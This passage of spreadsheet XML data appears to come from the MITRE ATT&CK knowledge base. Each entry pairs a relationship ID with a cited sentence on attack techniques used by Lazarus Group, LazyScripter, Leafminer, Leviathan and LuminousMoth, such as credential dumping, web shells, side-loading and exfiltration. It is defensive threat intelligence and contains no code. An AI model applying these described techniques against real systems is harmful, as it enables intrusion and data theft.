    <t>[Lazarus Group](https://attack.mitre.org/groups/G0032) has rebooted systems after destroying files and wiping the MBR on infected systems.(Citation: US-CERT SHARPKNOT June 2018)</t>
  </si>
  <si>
    <t>relationship--cc31afad-6349-4b66-a0a9-cd8f9de46aec</t>
  </si>
  <si>
    <t>A Destover-like implant used by [Lazarus Group](https://attack.mitre.org/groups/G0032) can obtain the current system time and send it to the C2 server.(Citation: McAfee GhostSecret)</t>
  </si>
  <si>
    <t>relationship--d0327dce-ca02-48ba-8830-85fcc574113c</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</si>
  <si>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</si>
  <si>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relationship--d35f6c6f-c1ed-4b0d-b95f-9fd762eb3ac7</t>
  </si>
  <si>
    <t>[Lazarus Group](https://attack.mitre.org/groups/G0032) has obtained a variety of tools for their operations, including [Responder](https://attack.mitre.org/software/S0174) and PuTTy PSCP.(Citation: Kaspersky ThreatNeedle Feb 2021)</t>
  </si>
  <si>
    <t>relationship--7b2e912e-4561-4edc-87fe-11f9e259a5a9</t>
  </si>
  <si>
    <t>[Lazarus Group](https://attack.mitre.org/groups/G0032) has used administrator credentials to gain access to restricted network segments.(Citation: Kaspersky ThreatNeedle Feb 2021)</t>
  </si>
  <si>
    <t>relationship--2c9c331c-0e39-43ad-95e4-38957ad7b956</t>
  </si>
  <si>
    <t>[Lazarus Group](https://attack.mitre.org/groups/G0032) has used VBA and embedded macros in Word documents to execute malicious code.(Citation: Lazarus APT January 2022)(Citation: Qualys LolZarus)</t>
  </si>
  <si>
    <t>relationship--7c1e0451-66d7-4445-9b8d-8d9770043421</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</si>
  <si>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</si>
  <si>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relationship--6549c38d-46b4-4633-a479-0cbeb405f186</t>
  </si>
  <si>
    <t>[Lazarus Group](https://attack.mitre.org/groups/G0032) has hosted malicious downloads on Github.(Citation: CISA AppleJeus Feb 2021)</t>
  </si>
  <si>
    <t>relationship--7e2b9c63-69ac-4050-b057-2fe16ef1d355</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</si>
  <si>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</si>
  <si>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relationship--032981a6-3299-4852-bd9c-c691f866bec5</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</si>
  <si>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</si>
  <si>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relationship--64a17aba-5182-4666-bd37-dafa9d835fe8</t>
  </si>
  <si>
    <t>Several [Lazarus Group](https://attack.mitre.org/groups/G0032) malware families install themselves as new services.(Citation: Novetta Blockbuster)(Citation: Novetta Blockbuster Destructive Malware)</t>
  </si>
  <si>
    <t>relationship--e42eef1a-107e-40a3-9227-45621e277ff3</t>
  </si>
  <si>
    <t>[LazyScripter](https://attack.mitre.org/groups/G0140) has leveraged the BatchEncryption tool to perform advanced batch script obfuscation and encoding techniques.(Citation: MalwareBytes LazyScripter Feb 2021)</t>
  </si>
  <si>
    <t>relationship--c18296e4-93a2-4f75-8bcb-4a05692d9940</t>
  </si>
  <si>
    <t xml:space="preserve">[LazyScripter](https://attack.mitre.org/groups/G0140) has leveraged dynamic DNS providers for C2 communications.(Citation: MalwareBytes LazyScripter Feb 2021) </t>
  </si>
  <si>
    <t>relationship--86e0245b-787c-4cf8-9399-531d64529d4d</t>
  </si>
  <si>
    <t>[LazyScripter](https://attack.mitre.org/groups/G0140) has used dynamic DNS providers to create legitimate-looking subdomains for C2.(Citation: MalwareBytes LazyScripter Feb 2021)</t>
  </si>
  <si>
    <t>relationship--691d0d23-9d20-470f-8483-73c7e10027a3</t>
  </si>
  <si>
    <t>[LazyScripter](https://attack.mitre.org/groups/G0140) had downloaded additional tools to a compromised host.(Citation: MalwareBytes LazyScripter Feb 2021)</t>
  </si>
  <si>
    <t>relationship--928f19e8-6174-47c9-b44a-87477d89bdc9</t>
  </si>
  <si>
    <t xml:space="preserve">[LazyScripter](https://attack.mitre.org/groups/G0140) has used JavaScript in its attacks.(Citation: MalwareBytes LazyScripter Feb 2021) </t>
  </si>
  <si>
    <t>relationship--67d072c0-3439-4a61-9a67-fb3f2b72d04e</t>
  </si>
  <si>
    <t>[LazyScripter](https://attack.mitre.org/groups/G0140) has lured users to open malicious email attachments.(Citation: MalwareBytes LazyScripter Feb 2021)</t>
  </si>
  <si>
    <t>relationship--4995fdc6-d705-48dc-a2e3-c6797ba2439f</t>
  </si>
  <si>
    <t>[LazyScripter](https://attack.mitre.org/groups/G0140) has relied upon users clicking on links to malicious files.(Citation: MalwareBytes LazyScripter Feb 2021)</t>
  </si>
  <si>
    <t>relationship--2f146c3d-5dd4-42e2-a62b-04adcb36485c</t>
  </si>
  <si>
    <t>[LazyScripter](https://attack.mitre.org/groups/G0140) has used a variety of open-source remote access Trojans for its operations.(Citation: MalwareBytes LazyScripter Feb 2021)</t>
  </si>
  <si>
    <t>relationship--89446c0a-0f1b-4d04-92fb-a04c6b16e474</t>
  </si>
  <si>
    <t xml:space="preserve">[LazyScripter](https://attack.mitre.org/groups/G0140) has used several different security software icons to disguise executables.(Citation: MalwareBytes LazyScripter Feb 2021) </t>
  </si>
  <si>
    <t>relationship--99717cce-1987-4ca1-8df2-c6ec6ce17cf5</t>
  </si>
  <si>
    <t xml:space="preserve">[LazyScripter](https://attack.mitre.org/groups/G0140) has used `mshta.exe` to execute [Koadic](https://attack.mitre.org/software/S0250) stagers.(Citation: MalwareBytes LazyScripter Feb 2021) </t>
  </si>
  <si>
    <t>relationship--3766cf55-568a-410f-8968-7a4adac96f77</t>
  </si>
  <si>
    <t>[LazyScripter](https://attack.mitre.org/groups/G0140) has used PowerShell scripts to execute malicious code.(Citation: MalwareBytes LazyScripter Feb 2021)</t>
  </si>
  <si>
    <t>relationship--9ee8a8fb-798e-4fa0-9ae0-ab96e75c9f4e</t>
  </si>
  <si>
    <t>[LazyScripter](https://attack.mitre.org/groups/G0140) has achieved persistence via writing a PowerShell script to the autorun registry key.(Citation: MalwareBytes LazyScripter Feb 2021)</t>
  </si>
  <si>
    <t>relationship--cb3117b7-3679-424d-bfb4-b28699cbba02</t>
  </si>
  <si>
    <t xml:space="preserve">[LazyScripter](https://attack.mitre.org/groups/G0140) has used `rundll32.exe` to execute [Koadic](https://attack.mitre.org/software/S0250) stagers.(Citation: MalwareBytes LazyScripter Feb 2021) </t>
  </si>
  <si>
    <t>relationship--ced83af5-76c5-4319-8d30-9682f71fe84f</t>
  </si>
  <si>
    <t>[LazyScripter](https://attack.mitre.org/groups/G0140) has used spam emails weaponized with archive or document files as its initial infection vector.(Citation: MalwareBytes LazyScripter Feb 2021)</t>
  </si>
  <si>
    <t>relationship--9cd8ce7f-7440-4ac4-b4cf-a758dd158672</t>
  </si>
  <si>
    <t>[LazyScripter](https://attack.mitre.org/groups/G0140) has used spam emails that contain a link that redirects the victim to download a malicious document.(Citation: MalwareBytes LazyScripter Feb 2021)</t>
  </si>
  <si>
    <t>relationship--e4946803-e448-4c85-902b-100e4d627ec3</t>
  </si>
  <si>
    <t>[LazyScripter](https://attack.mitre.org/groups/G0140) has hosted open-source remote access Trojans used in its operations in GitHub.(Citation: MalwareBytes LazyScripter Feb 2021)</t>
  </si>
  <si>
    <t>relationship--424ae88f-7405-4cab-9065-4d1e024a25c8</t>
  </si>
  <si>
    <t>[LazyScripter](https://attack.mitre.org/groups/G0140) has used VBScript to execute malicious code.(Citation: MalwareBytes LazyScripter Feb 2021)</t>
  </si>
  <si>
    <t>relationship--6f1ea286-593c-4255-9ea8-708e04184987</t>
  </si>
  <si>
    <t xml:space="preserve">[LazyScripter](https://attack.mitre.org/groups/G0140) has used GitHub to host its payloads to operate spam campaigns.(Citation: MalwareBytes LazyScripter Feb 2021) </t>
  </si>
  <si>
    <t>relationship--4e348b41-b607-4227-8734-06ef01d40f27</t>
  </si>
  <si>
    <t>[LazyScripter](https://attack.mitre.org/groups/G0140) has established GitHub accounts to host its toolsets.(Citation: MalwareBytes LazyScripter Feb 2021)</t>
  </si>
  <si>
    <t>relationship--ff9932dc-6afa-4aa6-834b-4ff1ac6d96bb</t>
  </si>
  <si>
    <t>[LazyScripter](https://attack.mitre.org/groups/G0140) has used batch files to deploy open-source and multi-stage RATs.(Citation: MalwareBytes LazyScripter Feb 2021)</t>
  </si>
  <si>
    <t>relationship--bc0a285a-fcee-4a9a-9d74-9f723d6c20c2</t>
  </si>
  <si>
    <t>[Leafminer](https://attack.mitre.org/groups/G0077) used several tools for retrieving login and password information, including LaZagne.(Citation: Symantec Leafminer July 2018)</t>
  </si>
  <si>
    <t>relationship--59a6ccad-02c1-4794-ac65-4d01c8ca7a3f</t>
  </si>
  <si>
    <t>[Leafminer](https://attack.mitre.org/groups/G0077) obfuscated scripts that were used on victim machines.(Citation: Symantec Leafminer July 2018)</t>
  </si>
  <si>
    <t>relationship--0eb683e1-bd09-4572-866a-f178ce54f7b6</t>
  </si>
  <si>
    <t>relationship--86847d37-f7da-4c30-ab48-2da87e6c1cff</t>
  </si>
  <si>
    <t>relationship--3d116ef6-d11b-4d04-9bf8-c51def11bd3b</t>
  </si>
  <si>
    <t>relationship--5d3f58bf-2192-46f9-bba3-27e917b75df6</t>
  </si>
  <si>
    <t>[Leafminer](https://attack.mitre.org/groups/G0077) has infected victims using watering holes.(Citation: Symantec Leafminer July 2018)</t>
  </si>
  <si>
    <t>relationship--bad12e35-72da-43bb-b61b-505ed72883c5</t>
  </si>
  <si>
    <t>[Leafminer](https://attack.mitre.org/groups/G0077) used a tool called MailSniper to search for files on the desktop and another utility called Sobolsoft to extract attachments from EML files.(Citation: Symantec Leafminer July 2018)</t>
  </si>
  <si>
    <t>relationship--f8a21871-d67b-4e89-82db-580d117d28fb</t>
  </si>
  <si>
    <t>[Leafminer](https://attack.mitre.org/groups/G0077) infected victims using JavaScript code.(Citation: Symantec Leafminer July 2018)</t>
  </si>
  <si>
    <t>relationship--cd45bd64-3793-49e7-82d0-9cdabf417d61</t>
  </si>
  <si>
    <t>relationship--8ffeeb33-0757-4b74-a4ae-504145bc473f</t>
  </si>
  <si>
    <t>[Leafminer](https://attack.mitre.org/groups/G0077) used several tools for retrieving login and password information, including LaZagne and Mimikatz.(Citation: Symantec Leafminer July 2018)</t>
  </si>
  <si>
    <t>relationship--21198a81-0fa4-4114-9a75-478e7212b87a</t>
  </si>
  <si>
    <t>[Leafminer](https://attack.mitre.org/groups/G0077) used a tool called Imecab to set up a persistent remote access account on the victim machine.(Citation: Symantec Leafminer July 2018)</t>
  </si>
  <si>
    <t>relationship--c6ee4856-1782-4430-af7f-4d71e84c9b97</t>
  </si>
  <si>
    <t>[Leafminer](https://attack.mitre.org/groups/G0077) scanned network services to search for vulnerabilities in the victim system.(Citation: Symantec Leafminer July 2018)</t>
  </si>
  <si>
    <t>relationship--4258ffdf-ecdb-465d-af16-bda97062ab7f</t>
  </si>
  <si>
    <t>[Leafminer](https://attack.mitre.org/groups/G0077) used a tool called Total SMB BruteForcer to perform internal password spraying.(Citation: Symantec Leafminer July 2018)</t>
  </si>
  <si>
    <t>relationship--c47b3759-8c59-45f7-8ae1-66b49a5359f8</t>
  </si>
  <si>
    <t xml:space="preserve">[Leafminer](https://attack.mitre.org/groups/G0077) has used [Process Doppelgänging](https://attack.mitre.org/techniques/T1055/013) to evade security software while deploying tools on compromised systems.(Citation: Symantec Leafminer July 2018)	</t>
  </si>
  <si>
    <t>relationship--926c11f2-853f-4393-9faf-2f3af174e578</t>
  </si>
  <si>
    <t>[Leafminer](https://attack.mitre.org/groups/G0077) used a tool called MailSniper to search through the Exchange server mailboxes for keywords.(Citation: Symantec Leafminer July 2018)</t>
  </si>
  <si>
    <t>relationship--f1f879a7-cd1e-4865-bc6a-9b42d36df62b</t>
  </si>
  <si>
    <t>[Leafminer](https://attack.mitre.org/groups/G0077) used Microsoft’s Sysinternals tools to gather detailed information about remote systems.(Citation: Symantec Leafminer July 2018)</t>
  </si>
  <si>
    <t>relationship--bfb1e467-dffc-463b-9f38-a3fafbb9d036</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</si>
  <si>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</si>
  <si>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relationship--1e902f51-efe0-4848-b47a-7e1a1664b101</t>
  </si>
  <si>
    <t>[Leviathan](https://attack.mitre.org/groups/G0065) has archived victim's data prior to exfiltration.(Citation: CISA AA21-200A APT40 July 2021)</t>
  </si>
  <si>
    <t>relationship--e37d3456-b3a0-4502-b502-a505f383cb4c</t>
  </si>
  <si>
    <t>[Leviathan](https://attack.mitre.org/groups/G0065) has used [BITSAdmin](https://attack.mitre.org/software/S0190) to download additional tools.(Citation: FireEye Periscope March 2018)</t>
  </si>
  <si>
    <t>relationship--b5894858-3f86-48f4-8ae0-7fcb8c19c36b</t>
  </si>
  <si>
    <t>[Leviathan](https://attack.mitre.org/groups/G0065) has inserted garbage characters into code, presumably to avoid anti-virus detection.(Citation: Proofpoint Leviathan Oct 2017)</t>
  </si>
  <si>
    <t>relationship--41bbe151-0ebe-4610-85d2-ba565e299d23</t>
  </si>
  <si>
    <t>[Leviathan](https://attack.mitre.org/groups/G0065) has used stolen code signing certificates to sign malware.(Citation: FireEye Periscope March 2018)(Citation: FireEye APT40 March 2019)</t>
  </si>
  <si>
    <t>relationship--9493cec9-dbbc-43ef-ae57-6f307f8d6001</t>
  </si>
  <si>
    <t>[Leviathan](https://attack.mitre.org/groups/G0065) has collected compromised credentials to use for targeting efforts.(Citation: CISA AA21-200A APT40 July 2021)</t>
  </si>
  <si>
    <t>relationship--2de94367-a058-4a31-b19b-fddebe02ca64</t>
  </si>
  <si>
    <t>[Leviathan](https://attack.mitre.org/groups/G0065) has used a DLL known as SeDll to decrypt and execute other JavaScript backdoors.(Citation: Proofpoint Leviathan Oct 2017)</t>
  </si>
  <si>
    <t>relationship--bb870870-2dfb-4ff3-9e17-6a75476d9be4</t>
  </si>
  <si>
    <t>[Leviathan](https://attack.mitre.org/groups/G0065) has established domains that impersonate legitimate entities to use for targeting efforts. (Citation: CISA AA21-200A APT40 July 2021)(Citation: Accenture MUDCARP March 2019)</t>
  </si>
  <si>
    <t>relationship--4f223b45-a599-4f97-9932-edfdc4425fde</t>
  </si>
  <si>
    <t>[Leviathan](https://attack.mitre.org/groups/G0065) has infected victims using watering holes.(Citation: CISA AA21-200A APT40 July 2021)</t>
  </si>
  <si>
    <t>relationship--67b0c62c-ce4f-4e08-8d8c-9e1fd4afe255</t>
  </si>
  <si>
    <t>[Leviathan](https://attack.mitre.org/groups/G0065) has utilized OLE as a method to insert malicious content inside various phishing documents. (Citation: Accenture MUDCARP March 2019)</t>
  </si>
  <si>
    <t>relationship--ad4a2d0b-a268-4334-903c-153858088138</t>
  </si>
  <si>
    <t>[Leviathan](https://attack.mitre.org/groups/G0065) has utilized techniques like reflective DLL loading to write a DLL into memory and load a shell that provides backdoor access to the victim.(Citation: Accenture MUDCARP March 2019)</t>
  </si>
  <si>
    <t>relationship--7995952f-370f-4514-a0c1-ce160b4c90c1</t>
  </si>
  <si>
    <t>[Leviathan](https://attack.mitre.org/groups/G0065) has compromised email accounts to conduct social engineering attacks.(Citation: CISA AA21-200A APT40 July 2021)</t>
  </si>
  <si>
    <t>relationship--fe4a20ca-7a57-44b7-bcf3-0f51fe9abffa</t>
  </si>
  <si>
    <t>[Leviathan](https://attack.mitre.org/groups/G0065) has created new email accounts for targeting efforts.(Citation: CISA AA21-200A APT40 July 2021)</t>
  </si>
  <si>
    <t>relationship--5cc7c5ef-f170-4147-8703-03ea34d40d12</t>
  </si>
  <si>
    <t>[Leviathan](https://attack.mitre.org/groups/G0065) has exfiltrated data over its C2 channel.(Citation: CISA AA21-200A APT40 July 2021)</t>
  </si>
  <si>
    <t>relationship--cd46796f-4a71-468a-b19f-87a13894d254</t>
  </si>
  <si>
    <t>[Leviathan](https://attack.mitre.org/groups/G0065) has used an uploader known as LUNCHMONEY that can exfiltrate files to Dropbox.(Citation: Proofpoint Leviathan Oct 2017)(Citation: FireEye Periscope March 2018)</t>
  </si>
  <si>
    <t>relationship--035e7890-593f-4f70-898a-93f3302f8fac</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</si>
  <si>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</si>
  <si>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relationship--829ec8ab-3e48-442b-beb2-b0d2dbdaaca0</t>
  </si>
  <si>
    <t>[Leviathan](https://attack.mitre.org/groups/G0065) has used external remote services such as virtual private networks (VPN) to gain initial access.(Citation: CISA AA21-200A APT40 July 2021)</t>
  </si>
  <si>
    <t>relationship--fa6bb182-28e8-4293-90ba-ee9a5c23d45b</t>
  </si>
  <si>
    <t>[Leviathan](https://attack.mitre.org/groups/G0065) has downloaded additional scripts and files from adversary-controlled servers.(Citation: Proofpoint Leviathan Oct 2017)(Citation: FireEye Periscope March 2018)</t>
  </si>
  <si>
    <t>relationship--273ad96c-269f-4736-a3de-646713c15b50</t>
  </si>
  <si>
    <t>[Leviathan](https://attack.mitre.org/groups/G0065) has conducted internal spearphishing within the victim's environment for lateral movement.(Citation: CISA AA21-200A APT40 July 2021)</t>
  </si>
  <si>
    <t>relationship--c00b008a-5f2c-4837-811b-21193b70b4ae</t>
  </si>
  <si>
    <t>[Leviathan](https://attack.mitre.org/groups/G0065) has used publicly available tools to dump password hashes, including ProcDump and WCE.(Citation: FireEye APT40 March 2019)</t>
  </si>
  <si>
    <t>relationship--31a8dc85-abb8-4144-9fe8-6d9a71339c0e</t>
  </si>
  <si>
    <t>[Leviathan](https://attack.mitre.org/groups/G0065) has used C:\Windows\Debug and C:\Perflogs as staging directories.(Citation: FireEye Periscope March 2018)(Citation: CISA AA21-200A APT40 July 2021)</t>
  </si>
  <si>
    <t>relationship--b7d36798-e9f2-4474-836e-80b100a561e6</t>
  </si>
  <si>
    <t>[Leviathan](https://attack.mitre.org/groups/G0065) has sent spearphishing attachments attempting to get a user to click.(Citation: Proofpoint Leviathan Oct 2017)(Citation: CISA AA21-200A APT40 July 2021)</t>
  </si>
  <si>
    <t>relationship--b979ce29-9d89-4d81-82fb-14240af7a241</t>
  </si>
  <si>
    <t>[Leviathan](https://attack.mitre.org/groups/G0065) has sent spearphishing email links attempting to get a user to click.(Citation: Proofpoint Leviathan Oct 2017)(Citation: CISA AA21-200A APT40 July 2021)</t>
  </si>
  <si>
    <t>relationship--f81ae9dc-3299-480f-817c-a5b65cfc38d7</t>
  </si>
  <si>
    <t>[Leviathan](https://attack.mitre.org/groups/G0065) has used multi-hop proxies to disguise the source of their malicious traffic.(Citation: CISA AA21-200A APT40 July 2021)</t>
  </si>
  <si>
    <t>relationship--3c4401bf-7a45-4d1d-a4ee-ea00788cd2aa</t>
  </si>
  <si>
    <t>[Leviathan](https://attack.mitre.org/groups/G0065) has used publicly available tools to dump password hashes, including [HOMEFRY](https://attack.mitre.org/software/S0232).(Citation: FireEye APT40 March 2019)</t>
  </si>
  <si>
    <t>relationship--fbcd00ef-0518-414d-9026-b736f036606a</t>
  </si>
  <si>
    <t>[Leviathan](https://attack.mitre.org/groups/G0065) has obfuscated code using base64 and gzip compression.(Citation: Proofpoint Leviathan Oct 2017)</t>
  </si>
  <si>
    <t>relationship--2c7d090e-09a1-4a45-baf4-b13790b483f6</t>
  </si>
  <si>
    <t>[Leviathan](https://attack.mitre.org/groups/G0065) has received C2 instructions from user profiles created on legitimate websites such as Github and TechNet.(Citation: FireEye Periscope March 2018)</t>
  </si>
  <si>
    <t>relationship--1cabd067-2229-488f-a244-03aa087b7e54</t>
  </si>
  <si>
    <t>[Leviathan](https://attack.mitre.org/groups/G0065) has used PowerShell for execution.(Citation: Proofpoint Leviathan Oct 2017)(Citation: FireEye Periscope March 2018)(Citation: CISA AA21-200A APT40 July 2021)(Citation: Accenture MUDCARP March 2019)</t>
  </si>
  <si>
    <t>relationship--71ae6f80-3d5c-4d61-8995-5844f9f592ed</t>
  </si>
  <si>
    <t>[Leviathan](https://attack.mitre.org/groups/G0065) has used protocol tunneling to further conceal C2 communications and infrastructure.(Citation: CISA AA21-200A APT40 July 2021)</t>
  </si>
  <si>
    <t>relationship--f71fa9f5-7a3c-43a7-8ca3-2e3c8996bde8</t>
  </si>
  <si>
    <t>[Leviathan](https://attack.mitre.org/groups/G0065) has used JavaScript to create a shortcut file in the Startup folder that points to its main backdoor.(Citation: Proofpoint Leviathan Oct 2017)(Citation: FireEye Periscope March 2018)</t>
  </si>
  <si>
    <t>relationship--2851e8fa-0622-42db-b7b7-4e051fc5fbeb</t>
  </si>
  <si>
    <t>[Leviathan](https://attack.mitre.org/groups/G0065) has used regsvr32 for execution.(Citation: Proofpoint Leviathan Oct 2017)</t>
  </si>
  <si>
    <t>relationship--c334b4c6-43f1-4452-8a1f-3d056fba9ac0</t>
  </si>
  <si>
    <t>[Leviathan](https://attack.mitre.org/groups/G0065) has staged data remotely prior to exfiltration.(Citation: CISA AA21-200A APT40 July 2021)</t>
  </si>
  <si>
    <t>relationship--bbd420ed-6959-4190-8317-2b9ecdc32856</t>
  </si>
  <si>
    <t xml:space="preserve">[Leviathan](https://attack.mitre.org/groups/G0065) has targeted RDP credentials and used it to move through the victim environment.(Citation: FireEye APT40 March 2019) </t>
  </si>
  <si>
    <t>relationship--d4c15cb6-ed2f-4ed0-8e6d-dd69e06c3c3f</t>
  </si>
  <si>
    <t>[Leviathan](https://attack.mitre.org/groups/G0065) used ssh for internal reconnaissance.(Citation: FireEye APT40 March 2019)</t>
  </si>
  <si>
    <t>relationship--25e695b0-1110-43ab-be79-5e89e3951759</t>
  </si>
  <si>
    <t>relationship--728dce0a-125c-4d66-8622-36d4d909352b</t>
  </si>
  <si>
    <t>[Leviathan](https://attack.mitre.org/groups/G0065) has compromised social media accounts to conduct social engineering attacks.(Citation: CISA AA21-200A APT40 July 2021)</t>
  </si>
  <si>
    <t>relationship--339b895c-48fa-4f99-9266-4310aeeb040f</t>
  </si>
  <si>
    <t>[Leviathan](https://attack.mitre.org/groups/G0065) has created new social media accounts for targeting efforts.(Citation: CISA AA21-200A APT40 July 2021)</t>
  </si>
  <si>
    <t>relationship--6de233bc-efe2-4dbd-b0a6-994d45f6bc23</t>
  </si>
  <si>
    <t>[Leviathan](https://attack.mitre.org/groups/G0065) has sent spearphishing emails with malicious attachments, including .rtf, .doc, and .xls files.(Citation: Proofpoint Leviathan Oct 2017)(Citation: CISA AA21-200A APT40 July 2021)</t>
  </si>
  <si>
    <t>relationship--7a64af0b-aebe-47d1-9f96-ef0ecad52df9</t>
  </si>
  <si>
    <t>[Leviathan](https://attack.mitre.org/groups/G0065) has sent spearphishing emails with links, often using a fraudulent lookalike domain and stolen branding.(Citation: Proofpoint Leviathan Oct 2017)(Citation: CISA AA21-200A APT40 July 2021)</t>
  </si>
  <si>
    <t>relationship--61f91f23-a8a5-4b4e-b546-f0fff28851a1</t>
  </si>
  <si>
    <t>[Leviathan](https://attack.mitre.org/groups/G0065) has used steganography to hide stolen data inside other files stored on Github.(Citation: CISA AA21-200A APT40 July 2021)</t>
  </si>
  <si>
    <t>relationship--6c9ed67e-95f1-4585-8d8d-14a27f21e14c</t>
  </si>
  <si>
    <t>[Leviathan](https://attack.mitre.org/groups/G0065) has obtained valid accounts to gain initial access.(Citation: CISA AA21-200A APT40 July 2021)(Citation: Accenture MUDCARP March 2019)</t>
  </si>
  <si>
    <t>relationship--90268df8-948a-4eb4-a21c-7b1c6808f669</t>
  </si>
  <si>
    <t>[Leviathan](https://attack.mitre.org/groups/G0065) has used VBScript.(Citation: Proofpoint Leviathan Oct 2017)</t>
  </si>
  <si>
    <t>relationship--88898d14-9313-4fdd-8ef5-584d8dcdec17</t>
  </si>
  <si>
    <t>[Leviathan](https://attack.mitre.org/groups/G0065) relies on web shells for an initial foothold as well as persistence into the victim's systems.(Citation: FireEye APT40 March 2019)(Citation: CISA AA21-200A APT40 July 2021)</t>
  </si>
  <si>
    <t>relationship--d0cd2d2a-3a74-488b-8227-00e32ed12291</t>
  </si>
  <si>
    <t>[Leviathan](https://attack.mitre.org/groups/G0065) has used WMI for execution.(Citation: Proofpoint Leviathan Oct 2017)</t>
  </si>
  <si>
    <t>relationship--23d208f5-cadc-4f80-94c4-5644eaa8b7c7</t>
  </si>
  <si>
    <t>[Leviathan](https://attack.mitre.org/groups/G0065) has used WMI for persistence.(Citation: FireEye Periscope March 2018)</t>
  </si>
  <si>
    <t>relationship--6b2cd244-a02f-4b76-85d9-a429a298f016</t>
  </si>
  <si>
    <t>[LuminousMoth](https://attack.mitre.org/groups/G1014) has used ARP spoofing to redirect a compromised machine to an actor-controlled website.(Citation: Bitdefender LuminousMoth July 2021)</t>
  </si>
  <si>
    <t>relationship--5cd6e7fd-b6c6-4796-91d5-6cf4ab724adf</t>
  </si>
  <si>
    <t>[LuminousMoth](https://attack.mitre.org/groups/G1014) has manually archived stolen files from victim machines before exfiltration.(Citation: Bitdefender LuminousMoth July 2021)</t>
  </si>
  <si>
    <t>relationship--9e8e158e-31a9-406e-8b58-68ef645b0cc8</t>
  </si>
  <si>
    <t>[LuminousMoth](https://attack.mitre.org/groups/G1014) has signed their malware with a valid digital signature.(Citation: Kaspersky LuminousMoth July 2021)</t>
  </si>
  <si>
    <t>relationship--eb4ce173-6f0e-4c12-9ff8-09c4fb1ae2d3</t>
  </si>
  <si>
    <t>[LuminousMoth](https://attack.mitre.org/groups/G1014) has used legitimate executables such as `winword.exe` and `igfxem.exe` to side-load their malware.(Citation: Kaspersky LuminousMoth July 2021)(Citation: Bitdefender LuminousMoth July 2021)</t>
  </si>
  <si>
    <t>relationship--7f8b1475-9e41-41d7-84f5-6c4041c4071a</t>
  </si>
  <si>
    <t>[LuminousMoth](https://attack.mitre.org/groups/G1014) has split archived files into multiple parts to bypass a 5MB limit.(Citation: Bitdefender LuminousMoth July 2021)</t>
  </si>
  <si>
    <t>relationship--07a569f4-ecb0-45b2-a880-3542508e9835</t>
  </si>
  <si>
    <t>[LuminousMoth](https://attack.mitre.org/groups/G1014) has collected files and data from compromised machines.(Citation: Kaspersky LuminousMoth July 2021)(Citation: Bitdefender LuminousMoth July 2021)</t>
  </si>
  <si>
    <t>relationship--65f63217-5473-4093-afcc-070c5e757a29</t>
  </si>
  <si>
    <t xml:space="preserve">[LuminousMoth](https://attack.mitre.org/groups/G1014) has used a valid digital certificate for some of their malware.(Citation: Kaspersky LuminousMoth July 2021) </t>
  </si>
  <si>
    <t>relationship--ea4a70c8-5952-4a61-86a2-bdc801a64dc8</t>
  </si>
  <si>
    <t>[LuminousMoth](https://attack.mitre.org/groups/G1014) has redirected compromised machines to an actor-controlled webpage through HTML injection.(Citation: Bitdefender LuminousMoth July 2021)</t>
  </si>
  <si>
    <t>relationship--28f7e7c9-76ef-48c7-b027-f32256ad2907</t>
  </si>
  <si>
    <t>[LuminousMoth](https://attack.mitre.org/groups/G1014) has used malware that exfiltrates stolen data to its C2 server.(Citation: Kaspersky LuminousMoth July 2021)</t>
  </si>
  <si>
    <t>relationship--28d81681-8dcf-45ee-a5e6-378327ce93ce</t>
  </si>
  <si>
    <t>[LuminousMoth](https://attack.mitre.org/groups/G1014) has exfiltrated data to Google Drive.(Citation: Bitdefender LuminousMoth July 2021)</t>
  </si>
  <si>
    <t>relationship--03aece39-d7a2-47a4-be1a-b1d6f1d72654</t>
  </si>
  <si>
    <t>[LuminousMoth](https://attack.mitre.org/groups/G1014) has used malware that scans for files in the Documents, Desktop, and Download folders and in other drives.(Citation: Kaspersky LuminousMoth July 2021)(Citation: Bitdefender LuminousMoth July 2021)</t>
  </si>
  <si>
    <t>relationship--95e83e36-ba44-4e8f-8afe-ff6622fd6f84</t>
  </si>
  <si>
    <t>[LuminousMoth](https://attack.mitre.org/groups/G1014) has used malware to store malicious binaries in hidden directories on victim's USB drives.(Citation: Kaspersky LuminousMoth July 2021)</t>
  </si>
  <si>
    <t>relationship--17bb48d5-7b1b-43be-b18e-07bc0462cad5</t>
  </si>
  <si>
    <t>[LuminousMoth](https://attack.mitre.org/groups/G1014) has downloaded additional malware and tools onto a compromised host.(Citation: Kaspersky LuminousMoth July 2021)(Citation: Bitdefender LuminousMoth July 2021)</t>
  </si>
  <si>
    <t>relationship--5a393124-ffca-447e-b230-468f2c57e023</t>
  </si>
  <si>
    <t>[LuminousMoth](https://attack.mitre.org/groups/G1014) has created a link to a Dropbox file that has been used in their spear-phishing operations.(Citation: Kaspersky LuminousMoth July 2021)</t>
  </si>
  <si>
    <t>relationship--33119ed3-3f9c-43b1-a371-53a1cfdce144</t>
  </si>
  <si>
    <t>[LuminousMoth](https://attack.mitre.org/groups/G1014) has lured victims into clicking malicious Dropbox download links delivered through spearphishing.(Citation: Kaspersky LuminousMoth July 2021)</t>
  </si>
  <si>
    <t>relationship--74480cd6-1f2e-4c2d-a1ad-82cc50d63d14</t>
  </si>
  <si>
    <t>[LuminousMoth](https://attack.mitre.org/groups/G1014) has used unique malware for information theft and exfiltration.(Citation: Kaspersky LuminousMoth July 2021)(Citation: Bitdefender LuminousMoth July 2021)</t>
  </si>
  <si>
    <t>relationship--3e26385f-0aa0-44a3-8830-978610a1680d</t>
  </si>
  <si>
    <t>[LuminousMoth](https://attack.mitre.org/groups/G1014) has obtained and used malware such as [Cobalt Strike](https://attack.mitre.org/software/S0154).(Citation: Kaspersky LuminousMoth July 2021)(Citation: Bitdefender LuminousMoth July 2021)</t>
  </si>
  <si>
    <t>relationship--05581e74-e78f-40e1-aa13-c990a99cbac3</t>
  </si>
  <si>
    <t>[LuminousMoth](https://attack.mitre.org/groups/G1014) has disguised their exfiltration malware as `ZoomVideoApp.exe`.(Citation: Kaspersky LuminousMoth July 2021)</t>
  </si>
  <si>
    <t>relationship--a980cbf6-262e-41c8-aec3-890ed77966ce</t>
  </si>
  <si>
    <t>[LuminousMoth](https://attack.mitre.org/groups/G1014) has used malware that adds Registry keys for persistence.(Citation: Kaspersky LuminousMoth July 2021)(Citation: Bitdefender LuminousMoth July 2021)</t>
  </si>
  <si>
    <t>relationship--b29088a3-47cf-4799-a8e5-428472908d06</t>
  </si>
  <si>
